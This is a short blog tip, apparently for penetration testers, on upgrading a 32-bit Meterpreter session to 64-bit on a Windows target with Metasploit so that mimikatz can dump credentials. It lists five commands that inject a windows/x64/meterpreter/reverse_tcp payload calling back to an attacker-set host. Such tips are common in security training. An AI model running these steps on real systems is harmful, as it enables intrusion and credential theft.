Converting a 32 bit Meterpreter to 64 bit


If you have a 32 bit Meterpreter session on a 64 bit Windows target, it's possible that you won't be able to perform certain tasks, like running mimikatz. In this case, you can upgrade your Meterpreter session, using these steps in Metasploit:

  1. use windows/local/payload_inject
  2. set session <session-number>
  3. set payload windows/x64/meterpreter/reverse_tcp
  4. set lhost <ip-address>
  5. run
This should spawn a new session which can be used by mimikatz, etc.





Comments

Popular Posts